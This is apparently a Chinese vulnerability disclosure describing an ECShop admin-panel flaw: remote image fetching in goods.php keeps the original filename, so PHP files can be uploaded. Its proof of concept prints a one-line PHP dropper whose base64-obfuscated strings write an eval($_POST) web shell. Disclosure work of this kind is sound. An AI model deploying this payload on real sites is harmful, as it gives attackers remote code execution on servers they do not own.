### 简要描述:
ecshop后台过滤不严可以上传php文件。。。。
### 详细说明:
问题出现在后台引用外部url图片时没有过滤文件格式,在/admin/goods.php第638行 ,
[<img src="https://images.seebug.org/upload/201311/24125414271daa4ed108e07995eb7d7b9bc913b9.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/24125414271daa4ed108e07995eb7d7b9bc913b9.png)
直接复制文件到temp文件夹下并且保留了原文件名,导致漏洞产生。
### 漏洞证明:
证明如下:
web1站点1.php文件内容
<?php fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbY10pPz4)); ?>
[<img src="https://images.seebug.org/upload/201311/2412584711e06c0d672d101a0d508d3b08451cd4.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/2412584711e06c0d672d101a0d508d3b08451cd4.png)
[<img src="https://images.seebug.org/upload/201311/241312527a70c81754acf6b321ba8e4fe53445ff.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/241312527a70c81754acf6b321ba8e4fe53445ff.png)
访问 http://127.0.0.1/temp/1.php 后即可生成shell
[<img src="https://images.seebug.org/upload/201311/2413152255a7fc6d986fe31e9ceba73228f23e9f.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/2413152255a7fc6d986fe31e9ceba73228f23e9f.png)
求个邀请码。。。
暂无评论